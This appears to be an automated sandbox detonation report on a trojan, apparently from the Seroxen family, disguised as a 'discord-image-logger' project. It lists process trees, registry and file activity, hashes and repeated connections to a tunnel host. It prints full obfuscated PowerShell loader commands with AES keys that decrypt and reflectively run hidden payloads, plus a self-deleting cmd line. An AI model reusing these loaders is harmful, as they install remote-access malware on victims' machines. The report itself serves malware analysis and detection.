0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{75055e9e-1b36-4a8b-9f64-3cffa611d538}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4128).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{83febc94-1ca6-478f-8026-e03b441fe7c1}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3c5b91d6-04b0-4f4a-a74e-50dec0c968d1}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e7f6cb63-c51b-41a7-b34e-90e070577354}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4252-6-0x00007FF894013000-0x00007FF894015000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dj1kg15s.2ae.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4252-16-0x0000024079190000-0x00000240791B2000-memory.dmp

memory/4252-17-0x00007FF894010000-0x00007FF894AD1000-memory.dmp

memory/4252-18-0x00007FF894010000-0x00007FF894AD1000-memory.dmp

memory/4252-19-0x0000024020310000-0x000002402033C000-memory.dmp

memory/4252-20-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/4252-21-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp

memory/4252-22-0x00007FF894013000-0x00007FF894015000-memory.dmp

memory/4252-23-0x0000024020680000-0x000002402163C000-memory.dmp

memory/4252-25-0x0000024021640000-0x0000024021928000-memory.dmp

memory/4252-27-0x0000024021930000-0x0000024021BC8000-memory.dmp

memory/4252-26-0x00007FF894010000-0x00007FF894AD1000-memory.dmp

memory/4252-28-0x0000024021BD0000-0x0000024021C28000-memory.dmp

memory/4252-30-0x0000024021C30000-0x0000024021C3C000-memory.dmp

memory/4252-29-0x00007FF894010000-0x00007FF894AD1000-memory.dmp

memory/5108-35-0x0000000140000000-0x0000000140004000-memory.dmp

memory/5108-33-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4252-31-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/4128-55-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/4128-56-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp

memory/4128-57-0x000001B575060000-0x000001B575460000-memory.dmp

memory/4128-58-0x000001B575460000-0x000001B575BD6000-memory.dmp

memory/4128-59-0x000001B575BE0000-0x000001B575FFA000-memory.dmp

memory/4128-60-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/4128-67-0x000001B576740000-0x000001B5767F2000-memory.dmp

memory/4128-66-0x000001B576630000-0x000001B576680000-memory.dmp

memory/4128-68-0x000001B576AB0000-0x000001B576C72000-memory.dmp

memory/4128-80-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp

memory/4128-79-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/3728-82-0x0000000140000000-0x0000000140029000-memory.dmp

memory/3728-83-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp

memory/3728-84-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp

C:\Windows\System32\ucrtbased.dll

MD5 7873612dddd9152d70d892427bc45ef0
SHA1 ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256 203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512 d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

C:\Windows\System32\vcruntime140d.dll

MD5 a366d6623c14c377c682d6b5451575e6
SHA1 a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA256 7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512 cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

C:\Windows\System32\vcruntime140_1d.dll

MD5 9ef28981adcbf4360de5f11b8f4ecff9
SHA1 219aaa1a617b1dfa36f3928bd1020e410666134f
SHA256 8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512 ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

memory/3728-81-0x0000000140000000-0x0000000140029000-memory.dmp

memory/4128-78-0x000001B5765E0000-0x000001B57660E000-memory.dmp

memory/3728-94-0x0000000140000000-0x0000000140029000-memory.dmp

memory/964-111-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/1144-126-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/1172-135-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/1172-134-0x000001A5B0690000-0x000001A5B06B7000-memory.dmp

memory/1152-132-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/1152-131-0x000001DC03E60000-0x000001DC03E87000-memory.dmp

memory/1156-129-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/1156-128-0x0000011645590000-0x00000116455B7000-memory.dmp

memory/1144-125-0x000001E5A5BC0000-0x000001E5A5BE7000-memory.dmp

memory/960-123-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/960-122-0x0000018BE5BB0000-0x0000018BE5BD7000-memory.dmp

memory/428-115-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/428-114-0x000001FC6A9A0000-0x000001FC6A9C7000-memory.dmp

memory/964-110-0x000002191B9D0000-0x000002191B9F7000-memory.dmp

memory/316-108-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/316-107-0x000001D334910000-0x000001D334937000-memory.dmp

memory/676-103-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/676-102-0x00000176F7EE0000-0x00000176F7F07000-memory.dmp

memory/588-99-0x00007FF872B30000-0x00007FF872B40000-memory.dmp

memory/588-98-0x000001B9F4C50000-0x000001B9F4C77000-memory.dmp

memory/588-97-0x000001B9F4C20000-0x000001B9F4C41000-memory.dmp

memory/4252-852-0x00007FF8A4933000-0x00007FF8A4934000-memory.dmp

memory/4252-854-0x00007FF894010000-0x00007FF894AD1000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20241023-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 0f948adab6823f1898be9db39ff7debb
SHA1 36672c3f675cc91e7e615f30b572619e25e45f5a
SHA256 a3cd44e09c90567367fe793d938c59a30e8f2844f769ebbf4bcfbb33554fd5e6
SHA512 0a6a3d4362c92c115054d32488de2cefe97e3739554a38eacb3ac68217041064eb459a3994164c004913caaffe316410baa1be4408049ffedbdaf8112326937b

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 5e32b031e7056ac3d4cfd7930526f53a
SHA1 1640491037ba4ff3abefd8b0cf9fd6b7246ec505
SHA256 1dab35e64e8597fe292c7b9af60eb6dbfeb5e81ebbe04e18fcac2a1cb5f70da6
SHA512 e404490b9ad96d95c308ebadf50e696fb12103e1e59f6fa930be34916003aa8de88b56bb57afad9cddefbd57471c5b37cb914142be4de4319b542cdebabb9711

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20240903-en

Max time kernel

120s

Max time network

124s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

Signatures

Seroxen family

seroxen

Seroxen, Ser0xen

trojan seroxen

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); 